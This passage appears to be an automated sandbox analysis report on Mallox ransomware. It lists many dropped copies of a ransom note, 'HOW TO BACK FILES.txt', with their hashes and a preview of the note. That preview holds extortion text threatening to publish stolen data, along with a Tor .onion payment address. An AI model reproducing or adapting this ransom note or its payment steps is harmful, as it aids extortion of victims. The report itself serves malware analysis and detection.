                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.2.2_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.2.2_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.2.2_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.2.2_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.2.2_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.2.2_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
